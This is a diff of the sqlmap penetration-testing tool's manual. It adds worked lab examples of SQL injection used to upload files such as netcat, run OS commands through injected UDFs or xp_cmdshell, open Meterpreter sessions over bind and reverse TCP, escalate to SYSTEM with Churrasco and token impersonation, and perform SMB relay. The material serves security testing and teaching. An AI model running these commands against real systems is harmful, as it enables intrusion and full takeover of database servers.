-The techniques implemented are detailed on the white paper +These techniques are detailed on the white paper .

-Example on a MySQL 5.0.67 target: +Example on a MySQL 5.0.67 target to upload a binary UPX-compressed +file: -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --write-file \ - "/home/inquis/software/netcat/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1 +$ file /tmp/nc.exe.packed +/tmp/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit + +$ ls -l /tmp/nc.exe.packed +-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" --write-file \ + "/tmp/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1 [...] -[01:12:29] [INFO] the back-end DBMS is MySQL +[hh:mm:29] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2003 or 2008 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: MySQL >= 5.0.0 -[01:12:29] [INFO] testing stacked queries support on parameter 'id' -[01:12:29] [INFO] detecting back-end DBMS version from its banner -[01:12:29] [INFO] retrieved: 5.0.67 -[01:12:36] [INFO] the web application supports stacked queries on parameter 'id' -[01:12:36] [INFO] fingerprinting the back-end DBMS operating system -[01:12:36] [INFO] retrieved: C -[01:12:36] [INFO] the back-end DBMS operating system is Windows +[hh:mm:29] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:29] [INFO] detecting back-end DBMS version from its banner +[hh:mm:29] [INFO] retrieved: 5.0.67 +[hh:mm:36] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:36] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:36] [INFO] retrieved: C +[hh:mm:36] [INFO] the back-end DBMS operating system is Windows do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully written on the back-end DBMS file system? 
[Y/n] y -[01:12:52] [INFO] retrieved: 31744 -[01:12:52] [INFO] the file has been successfully written and its size is 31744 bytes, same -size as the local file '/home/inquis/software/netcat/nc.exe.packed' +[hh:mm:52] [INFO] retrieved: 31744 +[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes, +same size as the local file '/tmp/nc.exe.packed' Operating system access -Execute an operating system command +Execute arbitrary operating system command

-Option: --os-cmd +Options: --os-cmd and --os-shell

-TODO +It is possible to execute arbitrary commands on the underlying operating +system when the back-end database management system is either MySQL, +PostgreSQL or Microsoft SQL Server and the session user has the needed +privileges to abuse database specific functionalities and architectural +weaknesses.

-The techniques implemented are detailed on the white paper +On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality +demonstrated above) a shared library (binary file) containing two +user-defined functions, sys_exec() and sys_eval(), then +it creates these two functions on the database and call one of them to +execute the specified command, depending on the user's choice to display +the standard output or not. +On Microsoft SQL Server, sqlmap abuses the xp_cmshell stored +procedure: if it's disable sqlmap re-enables it, if it does not exist, +sqlmap creates it from scratch. + +

+If the user wants to retrieve the command standard output, sqlmap will use +one of the enumeration SQL injection techniques (blind or inband) to +retrieve it, viceversa sqlmap will use the stacked query SQL injection +technique to execute the command without returning anything to the user. + +

+These techniques are detailed on the white paper . - -Prompt for an interactive operating system shell +

+It is possible to specify a single command to be executed with the +--os-cmd option.

-Option: --os-shell +Example on a PostgreSQL 8.3.5 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.aspx?id=1" \ + --os-cmd "whoami" -v 1 + +[...] +[hh:mm:05] [INFO] the back-end DBMS is PostgreSQL +web server operating system: Windows 2003 or 2008 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 +back-end DBMS: PostgreSQL + +[hh:mm:05] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:05] [INFO] detecting back-end DBMS version from its banner +[hh:mm:05] [INFO] retrieved: 8.3.5, +[hh:mm:15] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:15] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:15] [INFO] retrieved: 1 +[hh:mm:16] [INFO] the back-end DBMS operating system is Windows +[hh:mm:16] [INFO] testing if current user is DBA +[hh:mm:16] [INFO] retrieved: 1 +[hh:mm:16] [INFO] checking if sys_exec UDF already exist +[hh:mm:16] [INFO] retrieved: 0 +[hh:mm:18] [INFO] checking if sys_eval UDF already exist +[hh:mm:18] [INFO] retrieved: 0 +[hh:mm:20] [INFO] creating sys_exec UDF from the binary UDF file +[hh:mm:20] [INFO] creating sys_eval UDF from the binary UDF file +do you want to retrieve the command standard output? [Y/n] +[hh:mm:35] [INFO] retrieved: w2k3dev\postgres +command standard output: 'w2k3dev\postgres' +

-TODO +Example on a Microsoft SQL Server 2005 Service Pack 0 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \ + --os-cmd "whoami" --union-use -v 1 + +[...] +[hh:mm:58] [INFO] the back-end DBMS is Microsoft SQL Server +web server operating system: Windows 2000 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP +back-end DBMS: Microsoft SQL Server 2005 + +[hh:mm:58] [INFO] testing inband sql injection on parameter 'name' with NULL bruteforcing +technique +[hh:mm:58] [INFO] confirming full inband sql injection on parameter 'name' +[hh:mm:58] [WARNING] the target url is not affected by an exploitable full inband sql +injection vulnerability +[hh:mm:58] [INFO] confirming partial (single entry) inband sql injection on parameter 'name' +by appending a false condition after the parameter value +[hh:mm:58] [INFO] the target url is affected by an exploitable partial (single entry) inband +sql injection vulnerability +valid union: 'http://192.168.1.121:80/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION +ALL SELECT NULL, NULL, NULL-- AND 'SonLv'='SonLv' + +[hh:mm:58] [INFO] testing stacked queries support on parameter 'name' +[hh:mm:03] [INFO] the web application supports stacked queries on parameter 'name' +[hh:mm:03] [INFO] testing if current user is DBA +[hh:mm:03] [INFO] checking if xp_cmdshell extended procedure is available, wait.. +[hh:mm:09] [INFO] xp_cmdshell extended procedure is available +do you want to retrieve the command standard output? [Y/n] +[hh:mm:11] [INFO] the SQL query provided returns 1 entries +command standard output: +--- +nt authority\network service +--- +

-The techniques implemented are detailed on the white paper -. +It is also possible to simulate a real shell where you can type as many +arbitrary commands as you wish. The option is --os-shell and has +the same TAB completion and history functionalities implemented for +--sql-shell. + +

+Example on a MySQL 5.0.67 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \ + --os-shell -v 2 + +[...] +[hh:mm:36] [INFO] the back-end DBMS is MySQL +web server operating system: Windows 2003 or 2008 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 +back-end DBMS: MySQL >= 5.0.0 + +[hh:mm:36] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:36] [INFO] detecting back-end DBMS version from its banner +[hh:mm:36] [DEBUG] query: IFNULL(CAST(MID((VERSION()), 1, 6) AS CHAR(10000)), CHAR(32)) +[hh:mm:36] [INFO] retrieved: 5.0.67 +[hh:mm:37] [DEBUG] performed 49 queries in 1 seconds +[hh:mm:37] [DEBUG] query: SELECT SLEEP(5) +[hh:mm:42] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:42] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:42] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:42] [DEBUG] query: CREATE TABLE sqlmapfile(data text) +[hh:mm:42] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION()) +[hh:mm:42] [DEBUG] query: SELECT IFNULL(CAST(MID(@@datadir, 1, 1) AS CHAR(10000)), CHAR(32)) +[hh:mm:42] [INFO] retrieved: C +[hh:mm:42] [DEBUG] performed 14 queries in 0 seconds +[hh:mm:42] [INFO] the back-end DBMS operating system is Windows +[hh:mm:42] [DEBUG] cleaning up the database management system +[hh:mm:42] [DEBUG] removing support tables +[hh:mm:42] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:42] [INFO] testing if current user is DBA +[hh:mm:42] [DEBUG] query: SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user= +(SUBSTRING_INDEX(CURRENT_USER(), CHAR(64), 1)) LIMIT 0, 1)=CHAR(89)) THEN 1 ELSE 0 END) +[hh:mm:42] [INFO] retrieved: 1 +[hh:mm:43] [DEBUG] performed 5 queries in 0 seconds +[hh:mm:43] [INFO] checking if sys_exec UDF already exist +[hh:mm:43] [DEBUG] query: SELECT (CASE WHEN ((SELECT name FROM mysql.func WHERE name= +CHAR(115,121,115,95,101,120,101,99) LIMIT 0, 1)=CHAR(115,121,115,95,101,120,101,99)) 
+THEN 1 ELSE 0 END) +[hh:mm:43] [INFO] retrieved: 0 +[hh:mm:43] [DEBUG] performed 14 queries in 0 seconds +[hh:mm:43] [INFO] checking if sys_eval UDF already exist +[hh:mm:43] [DEBUG] query: SELECT (CASE WHEN ((SELECT name FROM mysql.func WHERE name= +CHAR(115,121,115,95,101,118,97,108) LIMIT 0, 1)=CHAR(115,121,115,95,101,118,97,108)) +THEN 1 ELSE 0 END) +[hh:mm:43] [INFO] retrieved: 0 +[hh:mm:43] [DEBUG] performed 14 queries in 0 seconds +[hh:mm:43] [DEBUG] going to upload the binary file with stacked query SQL injection technique +[hh:mm:43] [DEBUG] creating a support table to write the hexadecimal encoded file to +[hh:mm:43] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:43] [DEBUG] query: CREATE TABLE sqlmapfile(data longblob) +[hh:mm:43] [DEBUG] encoding file to its hexadecimal string value +[hh:mm:43] [DEBUG] forging SQL statements to write the hexadecimal encoded file to the +support table +[hh:mm:43] [DEBUG] inserting the hexadecimal encoded file to the support table +[hh:mm:43] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (0x4d5a90 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x000000 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0xffcbff [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x490068 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x1c5485 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x14cc63 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x207665 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x5c5379 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x0e5bc2 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x505357 [...]) +[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x000000 [...]) +[hh:mm:44] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x696372 [...]) +[hh:mm:44] [DEBUG] query: 
UPDATE sqlmapfile SET data=CONCAT(data,0xdd8400 [...]) +[hh:mm:44] [DEBUG] exporting the binary file content to file './libsqlmapudftxxgk.dll' +[hh:mm:44] [DEBUG] query: SELECT data FROM sqlmapfile INTO DUMPFILE './libsqlmapudftxxgk.dll' +[hh:mm:44] [DEBUG] cleaning up the database management system +[hh:mm:44] [DEBUG] removing support tables +[hh:mm:44] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:44] [INFO] creating sys_exec UDF from the binary UDF file +[hh:mm:44] [DEBUG] query: DROP FUNCTION sys_exec +[hh:mm:44] [DEBUG] query: CREATE FUNCTION sys_exec RETURNS int SONAME 'libsqlmapudftxxgk.dll' +[hh:mm:44] [INFO] creating sys_eval UDF from the binary UDF file +[hh:mm:44] [DEBUG] query: DROP FUNCTION sys_eval +[hh:mm:44] [DEBUG] query: CREATE FUNCTION sys_eval RETURNS string SONAME +'libsqlmapudftxxgk.dll' +[hh:mm:44] [DEBUG] creating a support table to write commands standard output to +[hh:mm:44] [DEBUG] query: DROP TABLE sqlmapoutput +[hh:mm:44] [DEBUG] query: CREATE TABLE sqlmapoutput(data longtext) +[hh:mm:44] [INFO] going to use injected sys_eval and sys_exec user-defined functions for +operating system command execution +[hh:mm:44] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER +os-shell> whoami +do you want to retrieve the command standard output? 
[Y/n] +[hh:mm:41] [DEBUG] query: INSERT INTO sqlmapoutput(data) VALUES (sys_eval('whoami')) +[hh:mm:41] [DEBUG] query: SELECT IFNULL(CAST(data AS CHAR(10000)), CHAR(32)) FROM +sqlmapoutput +[hh:mm:41] [INFO] retrieved: nt authority\system +[hh:mm:44] [DEBUG] performed 140 queries in 2 seconds +[hh:mm:44] [DEBUG] query: DELETE FROM sqlmapoutput +command standard output: 'nt authority\system' + +os-shell> [TAB TAB] +copy del dir echo md mem move +net netstat -na ver whoami xcopy + +os-shell> exit +[hh:mm:51] [INFO] cleaning up the database management system +[hh:mm:51] [DEBUG] removing support tables +[hh:mm:51] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:51] [DEBUG] query: DROP TABLE sqlmapoutput +do you want to remove sys_exec UDF? [Y/n] n +do you want to remove sys_eval UDF? [Y/n] n +[hh:mm:04] [INFO] database management system cleanup finished +[hh:mm:04] [WARNING] remember that UDF dynamic-link library files saved on the file system +can only be deleted manually + + +

+Now run it again, but specifying the --union-use to retrieve the +command standard output quicker, via UNION based SQL injection, when the +parameter is affected also by inband SQL injection vulnerability: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \ + --os-shell -v 2 --union-use + +[...] +[hh:mm:16] [INFO] the back-end DBMS is MySQL +web server operating system: Windows 2003 or 2008 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 +back-end DBMS: MySQL >= 5.0.0 + +[hh:mm:16] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing +technique +[hh:mm:16] [INFO] confirming full inband sql injection on parameter 'id' +[hh:mm:16] [INFO] the target url is affected by an exploitable full inband sql injection +vulnerability +valid union: 'http://192.168.1.121:80/sqlmap/mysql/iis/get_int.aspx?id=1 UNION ALL SELECT +NULL, NULL, NULL# AND 528=528' + +[hh:mm:16] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:16] [INFO] detecting back-end DBMS version from its banner +[hh:mm:16] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77), +MID((VERSION()), 1, 6),CHAR(117,114,115,75,117,102)), NULL# AND 3173=3173 +[hh:mm:16] [DEBUG] performed 1 queries in 0 seconds +[hh:mm:16] [DEBUG] query: SELECT SLEEP(5) +[hh:mm:21] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:21] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:21] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:21] [DEBUG] query: CREATE TABLE sqlmapfile(data text) +[hh:mm:21] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION()) +[hh:mm:21] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77), +MID(@@datadir, 1, 1),CHAR(117,114,115,75,117,102)), NULL# AND 6574=6574 +[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds +[hh:mm:21] [INFO] the back-end DBMS operating system is Windows +[hh:mm:21] [DEBUG] cleaning up the database management 
system +[hh:mm:21] [DEBUG] removing support tables +[hh:mm:21] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:21] [INFO] testing if current user is DBA +[hh:mm:21] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE +WHEN ((SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), CHAR(64), +1)) LIMIT 0, 1)=CHAR(89)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# AND 19=19 +[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds +[hh:mm:21] [INFO] checking if sys_exec UDF already exist +[hh:mm:21] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE WHEN +((SELECT name FROM mysql.func WHERE name=CHAR(115,121,115,95,101,120,101,99) LIMIT 0, 1)= +CHAR(115,121,115,95,101,120,101,99)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# +AND 4900=4900 +[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds +sys_exec UDF already exists, do you want to overwrite it? [y/N] n +[hh:mm:24] [INFO] checking if sys_eval UDF already exist +[hh:mm:24] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE WHEN +((SELECT name FROM mysql.func WHERE name=CHAR(115,121,115,95,101,118,97,108) LIMIT 0, 1)= +CHAR(115,121,115,95,101,118,97,108)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# +AND 4437=4437 +[hh:mm:24] [DEBUG] performed 1 queries in 0 seconds +sys_eval UDF already exists, do you want to overwrite it? [y/N] n +[hh:mm:25] [DEBUG] keeping existing sys_exec UDF as requested +[hh:mm:25] [DEBUG] keeping existing sys_eval UDF as requested +[hh:mm:25] [DEBUG] creating a support table to write commands standard output to +[hh:mm:25] [DEBUG] query: DROP TABLE sqlmapoutput +[hh:mm:25] [DEBUG] query: CREATE TABLE sqlmapoutput(data longtext) +[hh:mm:25] [INFO] going to use injected sys_eval and sys_exec user-defined functions for +operating system command execution +[hh:mm:25] [INFO] calling Windows OS shell. 
To quit type 'x' or 'q' and press ENTER +os-shell> ipconfig +do you want to retrieve the command standard output? [Y/n] +[hh:mm:29] [DEBUG] query: INSERT INTO sqlmapoutput(data) VALUES (sys_eval('ipconfig')) +[hh:mm:29] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),IFNULL(CAST +(data AS CHAR(10000)), CHAR(32)),CHAR(117,114,115,75,117,102)), NULL FROM sqlmapoutput# AND +7106=7106 +[hh:mm:29] [DEBUG] performed 1 queries in 0 seconds +[hh:mm:29] [DEBUG] query: DELETE FROM sqlmapoutput +command standard output: +--- + +Windows IP Configuration + + +Ethernet adapter Local Area Connection 2: + + Connection-specific DNS Suffix . : localdomain + IP Address. . . . . . . . . . . . : 192.168.1.121 + Subnet Mask . . . . . . . . . . . : 255.255.255.0 +---Default Gateway . . . . . . . . . : 192.168.1.1 + +os-shell> exit +[hh:mm:41] [INFO] cleaning up the database management system +[hh:mm:41] [DEBUG] removing support tables +[hh:mm:41] [DEBUG] query: DROP TABLE sqlmapfile +[hh:mm:41] [DEBUG] query: DROP TABLE sqlmapoutput +do you want to remove sys_exec UDF? [Y/n] n +do you want to remove sys_eval UDF? [Y/n] n +[hh:mm:54] [INFO] database management system cleanup finished +[hh:mm:54] [WARNING] remember that UDF dynamic-link library files saved on the file system +can only be deleted manually + + +

+As you can see from this second example, sqlmap firstly check if the two +user-defined functions are already created, if so, it asks the user if he +wants to recreate them or keep them and save time. Prompt for an out-of-band shell, meterpreter or VNC @@ -3996,12 +4351,251 @@ The techniques implemented are detailed on the white paper Options: --os-pwn, --priv-esc, --msf-path and --tmp-path

-TODO +It is possible to establish an out-of-band TCP stateful channel +between the attacker and the underlying operating system by using the +exploited SQL injection as a stepping stone. This is implemented for MySQL, +PostgreSQL and Microsoft SQL Server. +sqlmap relies on the to perform this attack, so you need to have it already +on your system: it's free and can be downloaded from the homepage. It is +advised to use Metasploit 3.3 development version from the subversion +repository.

-The techniques implemented are detailed on the white paper +Note that this feature is not supported by sqlmap running on Windows +because Metasploit's msfconsole and msfcli are not supported on the native +Windows Ruby interpreter. + +

+These techniques are detailed on the white paper . +

+Example on a MySQL 5.0.67 target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \ + --os-pwn -v 1 --msf-path /home/inquis/software/metasploit + +[...] +[hh:mm:17] [INFO] the back-end DBMS is MySQL +web server operating system: Windows 2003 or 2008 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 +back-end DBMS: MySQL >= 5.0.0 + +[hh:mm:17] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:17] [INFO] detecting back-end DBMS version from its banner +[hh:mm:17] [INFO] retrieved: 5.0.67 +[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:23] [INFO] retrieved: C +[hh:mm:23] [INFO] the back-end DBMS operating system is Windows +[hh:mm:23] [INFO] testing if current user is DBA +[hh:mm:23] [INFO] retrieved: 1 +[hh:mm:23] [INFO] checking if sys_exec UDF already exist +[hh:mm:23] [INFO] retrieved: 1 +[hh:mm:24] [INFO] sys_exec UDF already exists, do you want to overwrite it? [y/N] N +[hh:mm:24] [INFO] checking if sys_eval UDF already exist +[hh:mm:24] [INFO] retrieved: 1 +[hh:mm:24] [INFO] sys_eval UDF already exists, do you want to overwrite it? [y/N] N +[hh:mm:24] [INFO] creating Metasploit Framework 3 payload stager +[hh:mm:24] [INFO] which connection type do you want to use? +[1] Bind TCP (default) +[2] Bind TCP (No NX) +[3] Reverse TCP +[4] Reverse TCP (No NX) +> 1 +[hh:mm:24] [INFO] which is the back-end DBMS address? [192.168.1.121] 192.168.1.121 +[hh:mm:24] [INFO] which remote port numer do you want to use? [61588] 61588 +[hh:mm:24] [INFO] which payload do you want to use? +[1] Reflective Meterpreter (default) +[2] PatchUp Meterpreter (only from Metasploit development revision 6742) +[3] Shell +[4] Reflective VNC +[5] PatchUp VNC (only from Metasploit development revision 6742) +> 1 +[hh:mm:24] [INFO] which payload encoding do you want to use? 
+[1] No Encoder +[2] Alpha2 Alphanumeric Mixedcase Encoder +[3] Alpha2 Alphanumeric Uppercase Encoder +[4] Avoid UTF8/tolower +[5] Call+4 Dword XOR Encoder +[6] Single-byte XOR Countdown Encoder +[7] Variable-length Fnstenv/mov Dword XOR Encoder +[8] Polymorphic Jump/Call XOR Additive Feedback Encoder +[9] Non-Alpha Encoder +[10] Non-Upper Encoder +[11] Polymorphic XOR Additive Feedback Encoder (default) +[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder +[13] Alpha2 Alphanumeric Unicode Uppercase Encoder +> 11 +[hh:mm:24] [INFO] creation in progress .................. done +[hh:mm:42] [INFO] compression in progress . quit unexpectedly with return code 1 +[hh:mm:43] [INFO] failed to compress the file because you provided a Metasploit version +above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. +It might only slow down a bit the execution of sqlmap +[hh:mm:43] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfgcpge.exe' +[hh:mm:44] [INFO] running Metasploit Framework 3 command line interface locally, wait.. +[hh:mm:44] [INFO] running Metasploit Framework 3 payload stager remotely, wait.. +[*] Please wait while we load the module tree... +[*] Started bind handler +[*] Starting the payload handler... +[*] Transmitting intermediate stager for over-sized stage...(216 bytes) +[*] Sending stage (718336 bytes) +[*] Meterpreter session 1 opened (192.168.1.161:47832 -> 192.168.1.121:61588) + +meterpreter > Loading extension priv...success. +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > ipconfig + +MS TCP Loopback interface +Hardware MAC: 00:00:00:00:00:00 +IP Address : 127.0.0.1 +Netmask : 255.0.0.0 + + + +VMware Accelerated AMD PCNet Adapter +Hardware MAC: 00:0c:29:29:ee:86 +IP Address : 192.168.1.121 +Netmask : 255.255.255.0 + + +meterpreter > pwd +C:\Program Files\MySQL\MySQL Server 5.0\Data +meterpreter > exit + + +

+By default MySQL on Windows runs as SYSTEM, however PostgreSQL +run as a low-privileged user postgres on both Windows and Linux. +Microsoft SQL Server 2000 by default runs as SYSTEM, whereas +Microsoft SQL Server 2005 and 2008 run most of the times as NETWORK +SERVICE and sometimes as LOCAL SERVICE. + +It is possible to provide sqlmap with the --priv-esc option to +abuse Windows access tokens and escalate privileges to SYSTEM +within the Meterpreter session created if the underlying operating system +is not patched against Microsoft Security Bulletin +. +sqlmap performs the + +technique by uploading +local exploit and using it to call the Metasploit's payload stager +executable. sqlmap uses also the Metasploit's Meterpreter + +extension to abused Windows access tokens in conjunction to Churrasco +stand-alone exploit if the user wants so. + +

+Note that this feature is not supported by sqlmap installed from the +DEB package because it relies on Churrasco, which is not explicitly free +software so it has not been included in the package. + +

+This technique is detailed on the white paper +. + +

+Example on a Microsoft SQL Server 2005 Service Pack 0 running as +NETWORK SERVICE on the target: + + +$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \ + --os-pwn -v 1 --msf-path /home/inquis/software/metasploit --priv-esc + +[...] +[hh:mm:17] [INFO] the back-end DBMS is Microsoft SQL Server +web server operating system: Windows 2000 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP +back-end DBMS: Microsoft SQL Server 2005 + +[hh:mm:17] [INFO] testing stacked queries support on parameter 'name' +[hh:mm:22] [INFO] the web application supports stacked queries on parameter 'name' +[hh:mm:22] [INFO] testing if current user is DBA +[hh:mm:22] [INFO] retrieved: 1 +[hh:mm:23] [INFO] checking if xp_cmdshell extended procedure is available, wait.. +[hh:mm:29] [INFO] xp_cmdshell extended procedure is available +[hh:mm:29] [INFO] creating Metasploit Framework 3 payload stager +which connection type do you want to use? +[1] Bind TCP (default) +[2] Bind TCP (No NX) +[3] Reverse TCP +[4] Reverse TCP (No NX) +> 3 +which is the local address? [192.168.1.161] +which local port numer do you want to use? [61499] +[hh:mm:54] [INFO] forcing Metasploit payload to Meterpreter because it is the only payload +that can be used to abuse Windows Impersonation Tokens via Meterpreter 'incognito' +extension to privilege escalate +which payload encoding do you want to use? +[1] No Encoder +[2] Alpha2 Alphanumeric Mixedcase Encoder +[3] Alpha2 Alphanumeric Uppercase Encoder +[4] Avoid UTF8/tolower +[5] Call+4 Dword XOR Encoder +[6] Single-byte XOR Countdown Encoder +[7] Variable-length Fnstenv/mov Dword XOR Encoder +[8] Polymorphic Jump/Call XOR Additive Feedback Encoder +[9] Non-Alpha Encoder +[10] Non-Upper Encoder +[11] Polymorphic XOR Additive Feedback Encoder (default) +[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder +[13] Alpha2 Alphanumeric Unicode Uppercase Encoder +> +[hh:mm:58] [INFO] creation in progress .................. 
done +[hh:mm:16] [INFO] compression in progress . quit unexpectedly with return code 1 +[hh:mm:17] [INFO] failed to compress the file because you provided a Metasploit version +above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. +It might only slow down a bit the execution of sqlmap +[hh:mm:17] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfyahls.exe' +[hh:mm:20] [WARNING] often Microsoft SQL Server 2005 runs as Network Service which has no +Windows Impersonation Tokens within all threads, this makes Meterpreter's incognito +extension to fail to list tokens +do you want sqlmap to upload Churrasco and call the Metasploit payload stager as its +argument so that it will be started as SYSTEM? [Y/n] y +[hh:mm:36] [INFO] the binary file is bigger than 65280 bytes. sqlmap will split it into +chunks, upload them and recreate the original file out of the binary chunks server-side, +wait.. +[hh:mm:22] [INFO] file chunk 1 written +[14:10:06] [INFO] file chunk 2 written +[14:10:06] [INFO] running Metasploit Framework 3 command line interface locally, wait.. +[*] Please wait while we load the module tree... +[*] Handler binding to LHOST 0.0.0.0 +[*] Started reverse handler +[*] Starting the payload handler... +[14:10:31] [INFO] running Metasploit Framework 3 payload stager remotely, wait.. +[*] Transmitting intermediate stager for over-sized stage...(216 bytes) +[*] Sending stage (718336 bytes) +[*] Meterpreter session 1 opened (192.168.1.161:61499 -> 192.168.1.131:3221) + +meterpreter > +[14:11:01] [INFO] loading Meterpreter 'incognito' extension and displaying the list of +Access Tokens availables. Choose which user you want to impersonate by using incognito's +command 'impersonate_token' +Loading extension priv...success. +meterpreter > Loading extension incognito...success. 
+meterpreter > Server username: NT AUTHORITY\SYSTEM +meterpreter > +Delegation Tokens Available +======================================== +NT AUTHORITY\LOCAL SERVICE +NT AUTHORITY\NETWORK SERVICE +NT AUTHORITY\SYSTEM +W2K3DEV\Administrator +W2K3DEV\IUSR_WIN2003 +W2K3DEV\postgres + +Impersonation Tokens Available +======================================== +NT AUTHORITY\ANONYMOUS LOGON + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > exit + + One click prompt for an out-of-band shell, meterpreter or VNC @@ -4009,12 +4603,158 @@ The techniques implemented are detailed on the white paper Options: --os-smbrelay, --priv-esc and --msf-path

-TODO +If the back-end database management system runs as Administrator +and the underlying operating system is not patched against Microsoft +Security Bulletin , +sqlmap can abuse the universal naming convention (UNC) supported within +all database management systems to force the database server to initiate a +SMB connection with the attacker host, then perform a SMB authentication +relay attack in order to establish a high-privileged out-of-band TCP +stateful channel between the attacker host and the target database +server. +sqlmap relies on 's SMB relay exploit to perform this attack, so you need +to have it already on your system: it's free and can be downloaded from the +homepage. +You need to run sqlmap as root user if you want to perform a SMB +relay attack because it will need to listen on a user-specified SMB TCP +port for incoming connection attempts.

-The techniques implemented are detailed on the white paper +Note that this feature is not supported by sqlmap running on Windows +because Metasploit's msfconsole and msfcli are not supported on the native +Windows Ruby interpreter. + +

+This technique is detailed on the white paper . +

